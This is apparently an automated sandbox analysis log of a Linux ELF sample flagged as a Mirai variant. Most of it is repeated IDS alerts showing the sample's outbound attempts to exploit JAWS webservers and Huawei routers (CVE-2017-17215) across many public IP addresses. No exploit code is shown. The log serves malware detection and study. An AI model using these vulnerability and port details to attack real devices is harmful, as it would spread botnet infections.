          2024-12-03T22:17:32.227297+010028352221A Network Trojan was detected192.168.2.234806441.10.198.22837215TCP
          2024-12-03T22:17:32.577516+010028352221A Network Trojan was detected192.168.2.2347998156.69.225.3737215TCP
          2024-12-03T22:17:33.187064+010028352221A Network Trojan was detected192.168.2.2340718156.208.52.24137215TCP
          2024-12-03T22:17:33.218466+010028352221A Network Trojan was detected192.168.2.2340926197.105.244.7037215TCP
          2024-12-03T22:17:33.227172+010028352221A Network Trojan was detected192.168.2.235228041.183.102.8537215TCP
          2024-12-03T22:17:33.227302+010028352221A Network Trojan was detected192.168.2.2338664156.172.224.25537215TCP
          2024-12-03T22:17:33.227607+010028352221A Network Trojan was detected192.168.2.2348908197.214.166.19437215TCP
          2024-12-03T22:17:33.227627+010028352221A Network Trojan was detected192.168.2.2353936197.56.91.12537215TCP
          2024-12-03T22:17:33.227661+010028352221A Network Trojan was detected192.168.2.2350030156.7.106.19537215TCP
          2024-12-03T22:17:33.227861+010028352221A Network Trojan was detected192.168.2.234664841.184.151.8737215TCP
          2024-12-03T22:17:33.233612+010028352221A Network Trojan was detected192.168.2.2358786156.183.226.1537215TCP
          2024-12-03T22:17:33.233722+010028352221A Network Trojan was detected192.168.2.234808641.226.216.7337215TCP
          2024-12-03T22:17:33.249058+010028352221A Network Trojan was detected192.168.2.235549641.227.141.537215TCP
          2024-12-03T22:17:33.265186+010028352221A Network Trojan was detected192.168.2.234439441.38.160.16937215TCP
          2024-12-03T22:17:33.274228+010028352221A Network Trojan was detected192.168.2.236004441.254.203.18537215TCP
          2024-12-03T22:17:33.289914+010028352221A Network Trojan was detected192.168.2.2357946197.76.109.18037215TCP
          2024-12-03T22:17:33.436644+010028352221A Network Trojan was detected192.168.2.234127641.196.197.16137215TCP
          2024-12-03T22:17:33.524125+010028352221A Network Trojan was detected192.168.2.2357786197.38.60.23037215TCP
          2024-12-03T22:17:33.539693+010028352221A Network Trojan was detected192.168.2.233667241.200.27.18237215TCP
          2024-12-03T22:17:33.539821+010028352221A Network Trojan was detected192.168.2.234343041.69.219.16037215TCP
          2024-12-03T22:17:33.561556+010028352221A Network Trojan was detected192.168.2.235705641.145.182.11437215TCP
          2024-12-03T22:17:33.561770+010028352221A Network Trojan was detected192.168.2.2351606156.206.56.5637215TCP
          2024-12-03T22:17:33.592865+010028352221A Network Trojan was detected192.168.2.2347750156.106.22.13937215TCP
          2024-12-03T22:17:33.592943+010028352221A Network Trojan was detected192.168.2.2356230156.97.198.17837215TCP
          2024-12-03T22:17:33.608745+010028352221A Network Trojan was detected192.168.2.2343902197.241.105.17037215TCP
          2024-12-03T22:17:33.649148+010028352221A Network Trojan was detected192.168.2.2338242197.36.125.13637215TCP
          2024-12-03T22:17:33.649231+010028352221A Network Trojan was detected192.168.2.2355366197.86.128.8237215TCP
          2024-12-03T22:17:34.390050+010028352221A Network Trojan was detected192.168.2.2350138197.213.62.1937215TCP
          2024-12-03T22:17:34.390125+010028352221A Network Trojan was detected192.168.2.2345964156.139.198.24337215TCP
          2024-12-03T22:17:34.399443+010028352221A Network Trojan was detected192.168.2.2351708197.96.222.5137215TCP
          2024-12-03T22:17:34.421584+010028352221A Network Trojan was detected192.168.2.2347062156.42.169.12337215TCP
          2024-12-03T22:17:34.421782+010028352221A Network Trojan was detected192.168.2.2356446197.184.225.13937215TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86_64.elfAvira: detected
          Source: x86_64.elfReversingLabs: Detection: 76%
          Source: x86_64.elfJoe Sandbox ML: detected

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36100 -> 148.77.50.206:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36100 -> 148.77.50.206:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56390 -> 201.216.93.118:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56390 -> 201.216.93.118:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50814 -> 189.63.67.242:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50814 -> 189.63.67.242:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38588 -> 143.95.246.74:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38588 -> 143.95.246.74:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47024 -> 58.233.196.220:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47024 -> 58.233.196.220:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36064 -> 197.4.255.171:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58844 -> 41.215.18.134:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47242 -> 156.231.61.46:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38664 -> 41.71.190.203:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38202 -> 195.66.25.125:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38202 -> 195.66.25.125:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57118 -> 103.68.228.38:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57118 -> 103.68.228.38:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52546 -> 156.229.62.237:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52484 -> 197.7.168.119:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59658 -> 156.21.203.122:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51230 -> 197.137.137.132:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38366 -> 156.41.220.188:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50084 -> 141.23.106.58:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50084 -> 141.23.106.58:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51332 -> 5.50.172.102:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51332 -> 5.50.172.102:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34554 -> 44.97.239.58:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34554 -> 44.97.239.58:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54802 -> 69.105.106.1:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44002 -> 93.134.211.187:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54802 -> 69.105.106.1:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44002 -> 93.134.211.187:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53804 -> 46.29.80.182:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36578 -> 53.119.123.13:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53804 -> 46.29.80.182:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36578 -> 53.119.123.13:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56994 -> 106.125.175.246:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56994 -> 106.125.175.246:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58412 -> 191.107.11.36:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58412 -> 191.107.11.36:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49430 -> 142.163.169.148:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57904 -> 23.13.227.180:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49430 -> 142.163.169.148:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58214 -> 159.56.174.211:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41946 -> 108.128.143.21:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57904 -> 23.13.227.180:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58214 -> 159.56.174.211:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58950 -> 213.10.8.153:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58950 -> 213.10.8.153:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35632 -> 217.15.168.25:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38168 -> 136.30.197.42:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35632 -> 217.15.168.25:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38168 -> 136.30.197.42:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48852 -> 76.65.219.244:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48852 -> 76.65.219.244:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41946 -> 108.128.143.21:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57206 -> 193.208.82.87:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57206 -> 193.208.82.87:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54544 -> 137.84.118.55:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54544 -> 137.84.118.55:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55748 -> 50.18.129.224:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55748 -> 50.18.129.224:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40354 -> 177.102.58.160:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40354 -> 177.102.58.160:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49242 -> 156.47.9.159:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49242 -> 156.47.9.159:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41218 -> 72.185.180.188:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48268 -> 70.167.174.224:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41218 -> 72.185.180.188:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48268 -> 70.167.174.224:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51992 -> 44.100.34.190:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51992 -> 44.100.34.190:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51966 -> 115.64.13.91:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39680 -> 149.70.197.245:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42384 -> 95.148.172.170:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:39680 -> 149.70.197.245:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36024 -> 161.83.220.85:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52870 -> 156.126.99.239:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46164 -> 120.53.85.174:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51966 -> 115.64.13.91:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42384 -> 95.148.172.170:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36024 -> 161.83.220.85:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46164 -> 120.53.85.174:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44588 -> 186.244.224.1:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48250 -> 156.232.91.7:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44588 -> 186.244.224.1:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42740 -> 126.110.141.44:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54340 -> 89.199.198.11:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42740 -> 126.110.141.44:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54340 -> 89.199.198.11:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37802 -> 205.37.220.224:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37802 -> 205.37.220.224:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50274 -> 122.157.177.130:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50274 -> 122.157.177.130:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44064 -> 2.116.62.181:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44064 -> 2.116.62.181:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34050 -> 133.151.36.237:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34050 -> 133.151.36.237:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43316 -> 115.161.242.231:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43316 -> 115.161.242.231:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40602 -> 18.120.91.237:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42194 -> 197.26.74.237:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40602 -> 18.120.91.237:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39518 -> 156.170.127.69:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41426 -> 202.130.12.212:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41426 -> 202.130.12.212:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42698 -> 86.87.136.30:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42698 -> 86.87.136.30:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36696 -> 83.228.148.68:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55606 -> 138.128.101.135:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36696 -> 83.228.148.68:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55606 -> 138.128.101.135:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35558 -> 159.216.106.173:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35558 -> 159.216.106.173:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33370 -> 41.30.218.207:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55882 -> 70.48.67.132:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52836 -> 83.119.82.146:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55882 -> 70.48.67.132:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:52836 -> 83.119.82.146:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53878 -> 219.159.129.91:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53878 -> 219.159.129.91:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50074 -> 178.167.225.20:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50074 -> 178.167.225.20:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53678 -> 13.77.179.192:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53678 -> 13.77.179.192:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49922 -> 73.123.193.39:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59838 -> 8.163.124.143:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49922 -> 73.123.193.39:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33746 -> 51.0.21.42:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41702 -> 86.199.183.40:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59838 -> 8.163.124.143:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33746 -> 51.0.21.42:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:41702 -> 86.199.183.40:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57304 -> 197.132.62.119:37215
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56452 -> 197.193.108.120:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56424 -> 145.20.17.13:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60926 -> 32.60.240.155:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44360 -> 156.101.171.54:37215
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60926 -> 32.60.240.155:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51504 -> 120.125.222.84:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51504 -> 120.125.222.84:80
          Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39548 -> 156.81.76.10:37215
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44830 -> 23.93.194.133:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44830 -> 23.93.194.133:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56374 -> 163.247.225.173:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56374 -> 163.247.225.173:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59488 -> 89.148.112.82:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57510 -> 117.255.80.131:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59488 -> 89.148.112.82:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42718 -> 200.134.217.200:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:42718 -> 200.134.217.200:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37950 -> 159.180.151.117:80
          Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39452 -> 150.32.225.133:80
          Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37950 -> 159.180.151.117:80
